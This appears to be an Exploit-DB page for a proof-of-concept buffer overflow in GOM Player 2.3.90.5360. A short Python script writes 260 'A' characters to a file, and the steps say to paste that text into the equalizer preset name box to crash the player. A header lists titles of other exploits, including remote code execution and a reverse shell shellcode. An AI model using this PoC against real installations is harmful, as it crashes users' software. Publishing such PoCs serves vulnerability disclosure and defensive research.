
16 changes to exploits/shellcodes/ghdb Techview LA-5570 Wireless Gateway Home Automation Controller - Multiple Vulnerabilities Axigen < 10.3.3.47_ 10.2.3.12 - Reflected XSS Drupal 10.1.2 - web-cache-poisoning-External-service-interaction Jorani v1.0.3-(c)2014-2023 - XSS Reflected & Information Disclosure soosyze 2.0.0 - File Upload SPA-Cart eCommerce CMS 1.9.0.3 - SQL Injection Wordpress Plugin Elementor 3.5.5 - Iframe Injection Wp2Fac - OS Command Injection Maltrail v0.53 - Unauthenticated Remote Code Execution (RCE) SyncBreeze 15.2.24 - 'login' Denial of Service GOM Player 2.3.90.5360 - Buffer Overflow (PoC) GOM Player 2.3.90.5360 - Remote Code Execution (RCE) Windows/x64 - PIC Null-Free TCP Reverse Shell Shellcode (476 Bytes)
29 lines
No EOL
859 B
Python
Executable file
29 lines
No EOL
859 B
Python
Executable file
# Exploit Title: GOM Player 2.3.90.5360 - Buffer Overflow (PoC)
|
|
# Discovered by: Ahmet Ümit BAYRAM
|
|
# Discovered Date: 30.08.2023
|
|
# Vendor Homepage: https://www.gomlab.com
|
|
# Software Link: https://cdn.gomlab.com/gretech/player/GOMPLAYERGLOBALSETUP_NEW.EXE
|
|
# Tested Version: 2.3.90.5360 (latest)
|
|
# Tested on: Windows 11 64bit
|
|
# Thanks to: M. Akil GÜNDOĞAN
|
|
|
|
# - Open GOM Player
|
|
# - Click on the gear icon above to open settings
|
|
# - From the menu that appears, select Audio
|
|
# - Click on Equalizer
|
|
# - Click on the plus sign to go to the "Add EQ preset" screen
|
|
# - Copy the contents of exploit.txt and paste it into the preset name box, then click OK
|
|
# - Crashed!
|
|
|
|
#!/usr/bin/python
|
|
|
|
exploit = 'A' * 260
|
|
|
|
try:
|
|
file = open("exploit.txt","w")
|
|
file.write(exploit)
|
|
file.close()
|
|
|
|
print("POC is created")
|
|
except:
|
|
print("POC is not created") |